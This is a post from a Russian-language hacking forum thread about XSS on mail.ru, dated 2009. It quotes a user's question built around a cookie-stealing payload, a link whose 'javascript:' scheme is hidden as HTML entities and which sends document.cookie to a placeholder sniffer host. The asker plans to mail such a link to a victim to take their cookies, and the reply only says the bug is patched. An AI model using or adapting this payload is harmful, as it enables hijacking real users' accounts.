Тема: XSS на mail.ru
Показать сообщение отдельно

  #22  
Старый 20.05.2009, 16:11
R1k
Познающий
Регистрация: 08.05.2009
Сообщений: 39
Провел на форуме:
32852

Репутация: 20
По умолчанию

Цитата:
Сообщение от LemoTTT  
Давайте вы мне подробнее раскажете:
Вот код:
PHP код:
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a
Вопрос № 1:
PHP код:
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116 
Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои?
Баг уже прикрыли))) Можешь не пытаться даже
 
Ответить с цитированием